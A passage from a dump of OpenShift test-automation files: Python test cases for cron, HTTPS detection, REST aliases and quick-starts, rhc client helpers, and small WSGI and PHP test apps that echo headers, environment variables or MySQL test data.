ConnectTimeout=20 %s@%s \"cat $OPENSHIFT_DATA_DIR/date.txt\"' % (uuid, app_url))\n p.wait()\n try:\n ret = p.expect(\"\\d{2}:\\d{2}:\\d{2}@\\d{4}-\\d{2}-\\d{2}\")\n return ret\n except pexpect.TIMEOUT, e:\n print \"Failed to find data generated by cron job. %s\" % (e)\n except pexpect.EOF, e:\n print \"Failed to find data generated by cron job. %s\" % (e)\n return 1\n\n self.steps_list.append(testcase.TestCaseStep(\"Verify it\",\n check_the_cron,\n function_parameters = [self],\n expect_return = 0))\n\n self.steps_list.append(testcase.TestCaseStep(\"Stop cron...\",\n \"rhc cartridge stop %s -a %s -l %s -p '%s' %s\"\n %(common.cartridge_types['cron'], self.app_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return = 0))\n\n self.steps_list.append(testcase.TestCaseStep(\"Start cron...\",\n \"rhc cartridge start %s -a %s -l %s -p '%s' %s\"\n %(common.cartridge_types['cron'], self.app_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return = 0))\n\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(CronEmbed)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of cron_embed.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6366251111030579, "alphanum_fraction": 0.6471716165542603, "avg_line_length": 28.799999237060547, "blob_id": "12b5a9e5d5842ca2bf60dceadfadcdf5f62b7d9e", "content_id": "469c1c9d7b1e7646dc05afb99b6014a7b35362fd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1043, "license_type": "no_license", "max_line_length": 91, "num_lines": 35, "path": "/automation/open/testmodules/RT/cartridge/app_template/https/application", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os.path\nimport os\nimport sys\n\ntry:\n __file__\nexcept NameError:\n __file__ = '?'\n\n\ndef application(environ, start_response):\n \"\"\" The WSGI test application \"\"\"\n # emit status / headers\n status = \"200 OK\"\n headers = [('Content-Type', 'text/html'), ]\n start_response(status, headers)\n\n # assemble and return content\n return [environ[\"HTTP_X_FORWARDED_PROTO\"]]\n\n\nif __name__ == '__main__':\n # this runs when script is started directly from commandline\n try:\n # create a simple WSGI server and run the application\n from wsgiref import simple_server\n print \"Running test application - point your browser at http://localhost:8000/ ...\"\n httpd = simple_server.WSGIServer(('', 8000), simple_server.WSGIRequestHandler)\n httpd.set_app(application)\n httpd.serve_forever()\n except ImportError:\n # wsgiref not installed, just output html to stdout\n for content in application({}, lambda status, headers: None):\n print content\n" }, { "alpha_fraction": 0.5832699537277222, "alphanum_fraction": 0.5896071195602417, "avg_line_length": 45.96428680419922, "blob_id": "fdf04ce131e4318b2a43c1273d002187ffbbf81c", "content_id": "2fecb11886965e28f3338d040d8c47aba564c446", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3945, "license_type": "no_license", "max_line_length": 244, "num_lines": 84, "path": "/automation/open/prepare_testing_data/data/application", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\nimport os\nimport commands\nfrom cgi import escape\nfrom urlparse import parse_qs\nimport MySQLdb\n\nvirtenv = os.environ['APPDIR'] + '/virtenv/'\nos.environ['PYTHON_EGG_CACHE'] = os.path.join(virtenv, 'lib/python2.6/site-packages')\nvirtualenv = os.path.join(virtenv, 'bin/activate_this.py')\ntry:\n execfile(virtualenv, dict(__file__=virtualenv))\nexcept IOError:\n pass\n#\n# IMPORTANT: Put any additional includes below this line. If placed above this\n# line, it's possible required libraries won't be in your searchable path\n# \n\ndef application(environ, start_response):\n parameters = parse_qs(environ.get('QUERY_STRING', ''))\n ctype = 'text/plain'\n con=MySQLdb.connect(host=\"#host\",user=\"#user\",passwd=\"#passwd\",db=\"#dbname\",port=#port)\n cursor = con.cursor()\n cursor.execute('CREATE TABLE IF NOT EXISTS info(id INT NOT NULL AUTO_INCREMENT, data CHAR(200), PRIMARY KEY (id));')\n con.commit()\n if environ['PATH_INFO'] == '/health':\n response_body = \"1\"\n elif environ['PATH_INFO'] == '/env':\n response_body = ['%s: %s' % (key, value)\n for key, value in sorted(environ.items())]\n response_body = '\\n'.join(response_body)\n elif environ['PATH_INFO'] == '/insert':\n if 'size' in parameters:\n size = int(escape(parameters['size'][0]))\n else:\n size = 5000\n cursor.execute('SET autocommit=0;')\n for i in range(size):\n cursor.execute('INSERT INTO info VALUES(NULL, \"This is testing data for testing snapshoting and restoring big data in mysql database.This is testing data for testing snapshoting and restoring big data in mysql database.\");')\n cursor.execute('COMMIT;')\n cursor.execute('SET autocommit=1;')\n response_body = '''Gear DNS: %s\nSQL statements: \nINSERT INTO info VALUES(NULL, 'This is testing data for testing snapshoting and restoring big data in mysql database.This is testing data for testing snapshoting and restoring big data in mysql database.');\n%s records have been inserted into mysql''' % (os.environ['OPENSHIFT_GEAR_DNS'], size)\n elif environ['PATH_INFO'] == '/delete':\n cursor.execute('DELETE FROM info;');\n response_body = 'Gear DNS: %s\\nAll the records have been deleted from mysql database' % (os.environ['OPENSHIFT_GEAR_DNS'])\n elif environ['PATH_INFO'] == '/show':\n cursor.execute('SELECT COUNT(*) FROM info;')\n try:\n count = int(cursor.fetchone()[0])\n cursor.execute('SELECT * FROM info LIMIT 0, 1;')\n row = cursor.fetchone()\n except:\n count = 0\n response_body = 'Gear DNS: %s\\n' % (os.environ['OPENSHIFT_GEAR_DNS'])\n if count == 0:\n response_body += 'There is no record in database'\n else:\n response_body += 'There are %d records in database.\\nHere is one row:\\n%s\\n' % (count, row)\n else:\n ctype = 'text/plain'\n response_body = '''[rhc-cartridge]snapshot/restore big mysql data to existing app\\n[rhc-cartridge]snapshot/restore big mysql data to new app\\n'''\n\n cursor.execute('COMMIT;')\n cursor.close()\n con.commit()\n con.close()\n status = '200 OK'\n response_headers = [('Content-Type', ctype), ('Content-Length', str(len(response_body)))]\n #\n start_response(status, response_headers)\n return [response_body]\n\n#\n# Below for testing only\n#\nif __name__ == '__main__':\n from wsgiref.simple_server import make_server\n httpd = make_server('localhost', 8051, application)\n # Wait for a single request, serve it and quit.\n httpd.handle_request()\n" }, { "alpha_fraction": 0.48575711250305176, "alphanum_fraction": 0.4899217188358307, "avg_line_length": 39.1505012512207, "blob_id": "93a0cba542ddfbdaff3bd197ca9b9fb9ccbc954b", "content_id": "9a9868d0fa951cd2e8e987a08e8cfc9f5d315ba4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12006, "license_type": "no_license", "max_line_length": 119, "num_lines": 299, "path": "/automation/open/lib/common/client.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from consts import *\nfrom misc import *\nimport time, os, re\nimport OSConf\nimport openshift #rest api\nimport shutil\n\n#\n# All of the rhc-client helpers\n#\n\ndef create_app(app_name, app_type, user_email=None, user_passwd=None,\n clone_repo=True, git_repo=\"./\", scalable=False,\n gear_size = \"small\", timeout=None,\n disable_autoscaling=True):\n if user_email is None:\n (user_email, user_passwd) = get_default_rhlogin()\n if clone_repo == True:\n if git_repo == \"./\":\n options = \"\"\n cmd = \"ls %s\" % (app_name)\n else:\n options = \"-r %s\" %(git_repo)\n cmd = \"ls %s\" % (git_repo)\n else:\n options = \"--no-git\"\n cmd = \"true\"\n try:\n if os.path.exists(app_name):\n shutil.rmtree(app_name)\n except:\n pass\n\n cmd = (\"rhc app create %s %s -l %s -p %s\"\n \" %s %s\")% (app_name, app_type,\n user_email, user_passwd, \n options, RHTEST_RHC_CLIENT_OPTIONS)\n if scalable:\n cmd += \" -s \"\n\n if gear_size != \"small\":\n cmd += \" -g %s \" % ( gear_size )\n\n (ret, output) = command_getstatusoutput(cmd, quiet=False)\n\n if ret == 0:\n if not isDNS(output):\n OSConf.add_app(app_name, app_type, output)\n else:\n log.info(\"DNS issue - try to update cache via REST API\")\n OSConf.add_app(app_name, app_type, output)\n else:\n print \"ERROR!\\n\",output\n if is500(output): #or isDNS(output):\n raise MercyException(\"500\")\n return ret\n\n if scalable and disable_autoscaling:\n if clone_repo:\n touch(os.path.join(app_name,\".openshift/markers/disable_auto_scaling\"))\n cmd = \"cd %s && git add . && git commit -amt && git push\" % (app_name)\n log.debug(\"Disabling autoscaling...\")\n (retcode, output) = command_getstatusoutput(cmd, quiet = True)\n if retcode != 0:\n log.error(\"Unable to disable autoscaling: %s\"%output)\n else:\n log.warning(\"Unable to disable autoscaling->disabled clone_repo\")\n if app_type == app_types['jenkins']:\n print 'Waiting for jenkins server to get ready...'\n time.sleep(30)\n return ret\n\n\ndef create_scalable_app(app_name, app_type, user_email=None, user_passwd=None, \n clone_repo=True, git_repo=\"./\", gear_size=\"small\", \n disable_autoscaling=True):\n\n return create_app(app_name, app_type, user_email=user_email,\n user_passwd=user_passwd, clone_repo=clone_repo,\n git_repo=git_repo, scalable=True, gear_size=gear_size,\n disable_autoscaling=disable_autoscaling)\n\n\ndef stop_app(app_name, user_email, user_passwd):\n cmd = \"rhc app stop %s -l %s -p %s %s\"% (app_name, \n user_email, \n user_passwd, \n RHTEST_RHC_CLIENT_OPTIONS)\n (ret, output) = command_getstatusoutput(cmd)\n return ret\n\n\ndef start_app(app_name, user_email, user_passwd):\n cmd = \"rhc app start %s -l %s -p %s %s\"% (app_name, \n user_email, \n user_passwd, \n RHTEST_RHC_CLIENT_OPTIONS)\n (ret, output) = command_getstatusoutput(cmd)\n return ret\n\n\ndef force_stop_app(app_name, user_email, user_passwd):\n cmd = \"rhc app force-stop %s -l %s -p %s %s\"% (app_name, \n user_email, \n user_passwd, \n RHTEST_RHC_CLIENT_OPTIONS)\n (ret, output) = command_getstatusoutput(cmd)\n return ret\n\n\ndef restart_app(app_name, user_email, user_passwd):\n cmd = \"rhc app restart %s -l %s -p %s %s\"% (app_name, \n user_email, \n user_passwd, \n RHTEST_RHC_CLIENT_OPTIONS)\n (ret, output) = command_getstatusoutput(cmd)\n return ret\n\n\ndef reload_app(app_name, user_email, user_passwd):\n cmd = \"rhc app reload %s -l %s -p %s %s\"% (app_name, \n user_email, \n user_passwd, \n RHTEST_RHC_CLIENT_OPTIONS)\n (ret, output) = command_getstatusoutput(cmd)\n return ret\n\n\ndef embed(app_name, embed_cart, user_email=None, user_passwd=None):\n if user_email is None:\n (user_email, user_passwd) = get_default_rhlogin()\n obj = re.search(r\"(^[^-]+)-(.*)\", embed_cart)\n action = obj.group(1)\n embed_cart = obj.group(2)\n cmd = \"rhc cartridge %s %s -a %s -l %s -p '%s' %s\" % (action, \n embed_cart, \n app_name, \n user_email, \n user_passwd, \n RHTEST_RHC_CLIENT_OPTIONS)\n if action == \"remove\":\n cmd += \" --confirm\"\n (ret, output) = command_getstatusoutput(cmd)\n\n if ret == 0:\n try:\n ret2 = OSConf.update_embed(app_name, action, embed_cart, output)\n if ret2 != 0:\n log.error(\"Unable to cache embedded info.\")\n except Exception, e:\n log.error(\"Unable to cache embedded info: %s\"% e)\n else:\n log.error(output)\n #if is500(output): # or isDNS(output):\n #raise MercyException(\"500\")\n return ret\n\n\n#@repeat_if_failure\ndef destroy_app(app_name, user_email=None, user_passwd=None, clean_repo=False, git_repo=\"./\"):\n if user_email is None:\n (user_email, user_passwd) = get_default_rhlogin()\n if git_repo == \"./\":\n git_repo = app_name\n\n cmd = \"rhc app delete %s -l %s -p '%s' --confirm %s\"% (app_name, \n user_email, \n user_passwd, \n RHTEST_RHC_CLIENT_OPTIONS)\n\n (ret, output) = command_getstatusoutput(cmd, quiet=True)\n if clean_repo == True and os.path.exists(git_repo):\n shutil.rmtree(git_repo)\n\n if ret == 0:\n OSConf.remove_app(app_name)\n else:\n print output\n if is500(output) or isDNS(output):\n pass\n #raise MercyException(\"500 or DNS\")\n return ret\n\n\ndef add_sshkey(key_filepath=\"~/.ssh/id_rsa.pub\", key_name=\"default\", user_email=None, user_passwd=None, options=\"\"):\n if user_email is None:\n (user_email, user_passwd) = get_default_rhlogin()\n cmd = 'rhc sshkey add %s %s -l %s -p %s %s %s'% (key_name,\n key_filepath,\n user_email,\n user_passwd,\n options,\n RHTEST_RHC_CLIENT_OPTIONS)\n (ret, output) = command_getstatusoutput(cmd)\n if ret == 0:\n cmd = \"ssh-keygen -lf %s\" % (key_filepath)\n (ret, output) = command_getstatusoutput(cmd, quiet=True)\n try:\n pattern = re.compile(r'\\d+ ([\\w:]+) .*\\(([DR]SA)\\)')\n match_obj = pattern.search(output)\n fingerprint = match_obj.group(1)\n key_type = match_obj.group(2).lower()\n ret2 = OSConf.add_sshkey(key_name, key_type, fingerprint)\n if ret2 != 0:\n print \"Warning: Failed to add ssh key to OSConf\"\n except:\n print \"Warning: Failed to add ssh key to OSConf\"\n else:\n print output\n return ret\n\n\ndef remove_sshkey(key_name=\"default\", user_email=None, \n user_passwd=None, options=\"\"):\n if user_email is None:\n (user_email, user_passwd) = get_default_rhlogin()\n cmd = (\"rhc sshkey remove %s -l %s -p '%s' \"\n \" %s %s\")% (key_name, user_email, user_passwd, \n options, RHTEST_RHC_CLIENT_OPTIONS)\n (ret, output) = command_getstatusoutput(cmd)\n if ret == 0:\n ret2 = OSConf.remove_sshkey(key_name)\n if ret2 != 0:\n print \"Warning: Failed to remove ssh key from OSConf\"\n else:\n print output\n return ret\n\ndef update_sshkey(key_filepath=\"~/.ssh/id_rsa.pub\", key_name=\"default\", user_email=None, user_passwd=None, options=\"\"):\n '''Since there's no 'rhc sshkey update' now, this function is only used to make sure ssh key is correctly set'''\n if user_email is None:\n (user_email, user_passwd) = get_default_rhlogin()\n ret = remove_sshkey(key_name, user_email, user_passwd)\n if ret != 0:\n print \"Failed to remove key %s: %s\" % (key_name, key_filepath)\n ret = add_sshkey(key_filepath, key_name, user_email, user_passwd)\n if ret == 0:\n cmd = \"ssh-keygen -lf %s\" % (key_filepath)\n (ret, output) = command_getstatusoutput(cmd, quiet=True)\n try:\n pattern = re.compile(r'\\d+ ([\\w:]+) .*\\(([DR]SA)\\)')\n match_obj = pattern.search(output)\n fingerprint = match_obj.group(1)\n key_type = match_obj.group(2).lower()\n OSConf.update_sshkey(key_name, key_type, fingerprint)\n except:\n print \"Warning: Failed to update the ssh key stored in OSConf\"\n else:\n print \"Failed to add ssh key %s: %s\" % (key_name, key_filepath)\n return ret\n\ndef create_domain(domain_name, user_email=None, user_passwd=None, options=\"\"):\n if user_email is None:\n (user_email, user_passwd) = get_default_rhlogin()\n print domain_name\n cmd = 'rhc domain create %s -l %s -p \"%s\" %s %s'% (domain_name,\n user_email, \n user_passwd, \n options,\n RHTEST_RHC_CLIENT_OPTIONS)\n ret = command_get_status(cmd)\n if ret == 0:\n OSConf.initial_conf()\n return ret\n\n\ndef alter_domain(domain_name, user_email=None, user_passwd=None, options=\"\"):\n if user_email is None:\n (user_email, user_passwd) = get_default_rhlogin()\n old_domain = get_domain_name(user_email, user_passwd)\n cmd = 'rhc domain update %s %s -l %s -p \"%s\" %s %s'% (old_domain,\n domain_name,\n user_email, \n user_passwd, \n options,\n RHTEST_RHC_CLIENT_OPTIONS)\n ret = command_get_status(cmd)\n if ret == 0:\n OSConf.alter_domain(domain_name)\n return ret\n\n\ndef fix_domain(domain_name, user_email=None, user_passwd=None):\n if user_email is None:\n (user_email, user_passwd) = get_default_rhlogin()\n\n cmd = 'rhc domain show -l %s -p \"%s\"'% (user_email, user_passwd)\n (ret, output) = cmd_get_status_output(cmd)\n if ret != 0:\n print \"Failed to get domain info\"\n return 1\n if output.find(\"No namespaces found\") != -1:\n print \"Namespace is destroyed. Try to create it again.\"\n return create_domain(domain_name, user_email, user_passwd)\n elif output.find(\"Namespace: %s\" % (domain_name)) != -1:\n return 0\n else:\n print \"Alter namespace back\"\n return alter_domain(domain_name, user_email, user_passwd)\n\n" }, { "alpha_fraction": 0.5329815149307251, "alphanum_fraction": 0.5329815149307251, "avg_line_length": 26.071428298950195, "blob_id": "a215ed73c7fdd728ef49c13246ec1ae605e52be0", "content_id": "0a6bd0a8924df3d39a2e75d7dcc8290f8aa4ee23", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 379, "license_type": "no_license", "max_line_length": 134, "num_lines": 14, "path": "/automation/open/testmodules/RT/cartridge/app_template/universal/php/universal.php", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "<?php\nheader(\"Content-Type: text/plain\");\nif(!empty($_GET[\"group\"])) {\n $group = urldecode($_GET[\"group\"]);\n if($group == \"env\") {\n foreach ($_ENV as $key=>$val) {\n echo $key.\"=\".$val.\"\\n\";\n }\n }\n}\nelse {\n echo \"Usage: $_ENV[OPENSHIFT_APP_DNS]/universal.php?group=<group>\\nnValid groups are 'shell', 'mongodb', 'mysql', 'postgresql'\\n\";\n}\n?>\n" }, { "alpha_fraction": 0.6268706321716309, "alphanum_fraction": 0.6328566670417786, "avg_line_length": 37.5512809753418, "blob_id": "08d14ed384a2a844dc25d49bbbf3a950361d38e4", "content_id": "7b782db3f682b0fa1ba48ca74dde2f8a1e2eb065", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3007, "license_type": "no_license", "max_line_length": 118, "num_lines": 78, "path": "/automation/open/testmodules/RT/quick_start/quick_start_diy_binhello.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\ntestdir = os.path.normpath(WORK_DIR + \"/../../../\")\nsys.path.append(testdir)\n\nimport rhtest\nimport common\n# user defined packages\nimport urllib\nfrom quick_start_test import QuickStartTest\n\nclass QuickStartDiyBinhello(QuickStartTest):\n \n def __init__(self, config):\n rhtest.Test.__init__(self, config)\n self.config.application_type = common.app_types[\"diy\"]\n self.config.application_embedded_cartridges = [ ]\n self.config.summary = \"[Runtime][rhc-cartridge]quick-start example: DYI-Binhello\"\n self.config.page = \"\" # means '/'\n self.config.page_pattern = \"Hello, World!\"\n \n def configuration_steps(self):\n self.log_info(\"Configuring\")\n \n # Getting binhello\n # Saving to $GIT_REPO/bin\n print \"Creating directory: %s/bin\" % self.config.application_name\n os.mkdir(self.config.application_name + \"/bin\")\n print \"Downloading remote binary\"\n remote_binary = urllib.urlopen(\"https://raw.github.com/openshift/openshift-diy-binhello-demo/master/binhello\")\n binhello_binary = open(\"%s/bin/binhello\" % self.config.application_name, \"w\")\n binhello_binary.write(remote_binary.read())\n binhello_binary.close()\n print \"Adding execution permissions to the binary\"\n os.chmod(\"%s/bin/binhello\" % self.config.application_name, 0755)\n \n #Editing configuration files\n start_hook_filename = \"%s/.openshift/action_hooks/start\" % self.config.application_name\n print \"Editing configuration file: \" + start_hook_filename\n start_hook = open(start_hook_filename, \"w\")\n start_hook.write(\"#!/bin/bash\\n\")\n start_hook.write(\"cd $OPENSHIFT_REPO_DIR/bin\\n\")\n start_hook.write(\"nohup ./binhello >${OPENSHIFT_DIY_LOG_DIR}/binhello.log 2>&1 &\\n\")\n start_hook.close()\n os.chmod(start_hook_filename, 0755)\n \n stop_hook_filename = \"%s/.openshift/action_hooks/stop\" % self.config.application_name\n print \"Editing configuration file: \" + stop_hook_filename\n stop_hook = open(stop_hook_filename, \"w\")\n stop_hook.write(\"#!/bin/bash\\n\")\n stop_hook.write(\"kill `ps -ef | grep binhello | grep -v grep | awk '{ print $2 }'` > /dev/null 2>&1\\n\")\n stop_hook.write(\"exit 0\\n\")\n stop_hook.close()\n os.chmod(stop_hook_filename, 0755)\n \n def pre_deployment_steps(self):\n self.log_info(\"Performing additional step before deploying\")\n steps = [\n \"cd %s\" % self.config.application_name,\n \"git add .\",\n \"git commit -a -m testing\"\n ]\n ret_code = common.command_get_status(\" && \".join(steps)) \n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(QuickStartDiyBinhello)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6268486976623535, "alphanum_fraction": 0.6308304667472839, "avg_line_length": 26.904762268066406, "blob_id": "8e13a33edfb847470db3706cca6dc24e182a1d69", "content_id": "dba789254e7adc2e76aea13ccf241aa4f4e1a7f5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1758, "license_type": "no_license", "max_line_length": 74, "num_lines": 63, "path": "/automation/open/testmodules/RT/rest/rest_api_alias.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nimport testcase, common, OSConf\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\n#import openshift\n\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n tcms_testcase_id=141682\n params = {'klass': self, 'mode': 2, 'app_type': 'php'}\n self = common.setup_testbed(**params)\n\n #status, res = rest.app_create(self.app_name, self.app_type)\n\n def finalize(self):\n pass\n\n\nclass RestApiAlias(OpenShiftTest):\n def test_method(self):\n cf = self.config\n rest = cf.rest_api\n alias_name = \"my_other_name\"\n invalid_alias_name = \"[]\"\n self.info(\"Adding alias to existing app using REST API...\")\n status, res = rest.app_add_alias(cf.app_name, alias_name)\n self.info(\"OP STATUS: %s\" % status)\n status, res = rest.app_remove_alias(cf.app_name, alias_name)\n self.info(\"OP STATUS: %s\" % status)\n status, res = rest.app_add_alias(cf.app_name, invalid_alias_name)\n self.info(\"OP STATUS: %s\" % status)\n\n #cf.rest_api.app_add_alias(\n if status == 'Unprocessable Entity':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(RestApiAlias)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5782644152641296, "alphanum_fraction": 0.6115166544914246, "avg_line_length": 18.870967864990234, "blob_id": "0de22a5262d2344abc51315c14e9acf8736d3dc4", "content_id": "7dacc1c5fc256dc7803bdc1bbc36f2f891cb9b67", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1233, "license_type": "no_license", "max_line_length": 88, "num_lines": 62, "path": "/automation/open/testmodules/UI/web/case_141733.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_141733.py\n# Date: 2012/08/10 11:23\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass add_cron(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n\n web.login()\n\n #create a jbosseap app\n web.create_app(\"jbosseap-6.0\",\"jbosseap\")\n time.sleep(5)\n \n #add metrics cartridge\n web.add_cartridge(\"jbosseap\", \"cron-1.4\")\n web.assert_text_equal_by_xpath(\"Cron 1.4\",'''//div[@id='cartridge_type_']/h3''')\n\n #delete a jbosseap app\n web.delete_last_app(\"jbosseap\")\n \n self.tearDown()\n\n return self.passed(\" case 141733 is passed.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(add_cron)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_141733.py\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5732707977294922, "alphanum_fraction": 0.5821805596351624, "avg_line_length": 36.07826232910156, "blob_id": "f7417a1764b1cb36e384c585046653cf037580f8", "content_id": "258041bf5c38ec1820452adb5fde7104209861e2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4265, "license_type": "no_license", "max_line_length": 166, "num_lines": 115, "path": "/automation/open/testmodules/RT/cartridge/detect_app_over_https.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nJiangtao Zhao\[email protected]\nFeb 10, 2012\n1115] [rhc-cartridge]detect app come over https or http\nhttps://tcms.engineering.redhat.com/case/122351/\n\"\"\"\nimport os,sys,re\n\nimport testcase\nimport common\nimport OSConf\nimport rhtest\n# user defined packages\nimport openshift\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = \"[US1115] [rhc-cartridge]detect app come over https or http\"\n try:\n self.test_variant = self.config.test_variant\n except:\n self.test_variant = \"php\"\n\n self.app_name = self.test_variant.split('-')[0] + \"https\"\n self.git_repo = os.path.abspath(os.curdir)+os.sep+self.app_name\n self.app_type = common.app_types[self.test_variant]\n self.steps_list = []\n tcms_testcase_id=122351\n common.env_setup()\n\n def finalize(self):\n pass\n\nclass DetectAppOverHttps(OpenShiftTest):\n def test_method(self):\n\n self.steps_list.append(testcase.TestCaseStep(\"Create an %s app\" % (self.app_name),\n common.create_app,\n function_parameters=[self.app_name, \n self.app_type, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd],\n expect_description=\"the app should be created successfully\",\n expect_return=0))\n\n type_to_cmd = { \n \"php\" : \"cp -f %s/app_template/https/index.php %s/php/\" % (WORK_DIR, self.git_repo),\n \"jbossas\" : \"rm -f %s/src/main/webapp/index.html && cp -f %s/app_template/https/index.jsp %s/src/main/webapp/\" % (self.git_repo, WORK_DIR, self.git_repo)}\n\n self.steps_list.append(testcase.TestCaseStep(\"Copy the corresponding app template to the git repo\",\n type_to_cmd[self.test_variant],\n expect_description=\"Copy succeed\",\n expect_return=0))\n\n self.steps_list.append(testcase.TestCaseStep(\"Git push the changes\",\n \"cd %s && git add . && git commit -am t && git push\" % (self.git_repo),\n expect_description=\"git push should succeed\",\n expect_return=0))\n\n def get_app_url(self, proto):\n def closure():\n return proto+\"://\"+OSConf.get_app_url(self.app_name)\n return closure\n\n if self.test_variant == \"php\":\n regex = r'X-Forwarded-Proto </td><td class=\"v\">http </td>'\n elif self.test_variant == \"jbossas\":\n regex = r'x-forwarded-proto:<BR>http<BR>'\n self.steps_list.append(testcase.TestCaseStep(\"Check the app through HTTP\",\n common.grep_web_page,\n function_parameters=[get_app_url(self,\"http\"), regex, \"-H 'Pragma: no-cache'\", 3, 6],\n expect_description=\"X-Forwarded-Proto should be http\",\n expect_return=0))\n\n if self.test_variant == \"php\":\n regex = r'X-Forwarded-Proto </td><td class=\"v\">https </td>'\n elif self.test_variant == \"jbossas\":\n regex = r'x-forwarded-proto:<BR>https<BR>'\n self.steps_list.append(testcase.TestCaseStep(\"Check the app through HTTPS\",\n common.grep_web_page,\n function_parameters=[get_app_url(self,\"https\"), regex, \"-H 'Pragma: no-cache' -k\", 3, 6],\n expect_description=\"X-Forwarded-Proto should be https\",\n expect_return=0))\n \n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(DetectAppOverHttps)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5735849142074585, "alphanum_fraction": 0.5790356397628784, "avg_line_length": 44.86538314819336, "blob_id": "f851a916c5cf10785723f6bdca81dca3a56749ab", "content_id": "3a9759246a0c417fa837f5fc20773b6792dd47b6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 2385, "license_type": "no_license", "max_line_length": 240, "num_lines": 52, "path": "/automation/open/testmodules/RT/cartridge/app_template/bigdata/mysql/mysql.php", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "<?php\n$con=mysql_connect(\"#host:#port\",\"#user\",\"#passwd\") or die(mysql_error());\nmysql_select_db(\"#dbname\",$con);\nmysql_query(\"CREATE TABLE IF NOT EXISTS info(id INT NOT NULL AUTO_INCREMENT, data CHAR(200), PRIMARY KEY (id));\", $con);\nmysql_query(\"COMMIT\", $con);\n$OPENSHIFT_GEAR_DNS = getenv(\"OPENSHIFT_GEAR_DNS\");\nif(!empty($_GET[\"action\"])) {\n if($_GET[\"action\"] == \"insert\") {\n echo \"Gear DNS: \".$OPENSHIFT_GEAR_DNS.\"<br />\";\n echo \"SQL statements:<br />\";\n echo \"INSERT 